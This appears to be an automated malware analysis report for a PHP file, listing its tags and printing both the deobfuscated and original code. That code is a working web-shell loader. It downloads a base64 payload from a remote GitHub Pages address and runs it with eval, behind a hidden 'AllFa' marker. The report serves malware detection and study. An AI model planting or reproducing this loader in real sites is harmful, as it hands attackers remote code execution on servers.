PHP Malware Analysis

Filename: cvdr2.php

Tags

Encoding
  • base64_decode
URLs
Execution
  • eval
Files
  • file_get_contents

Deobfuscated code

<?php

$r3d = "https://cavdar59.github.io/alfa";
$l3nin = file_get_contents($r3d);
eval("?>" . base64_decode($l3nin));
?>
<!DOCTYPE html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<div style="display: none;">
<h1>AllFa</h1>
</html>


Original code

<?php
$r3d = "https://cavdar59.github.io/alfa";
$l3nin = file_get_contents($r3d); 
eval("?>".(base64_decode($l3nin)));
?>
<!DOCTYPE html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<div style="display: none;">
<h1>AllFa</h1>
</html>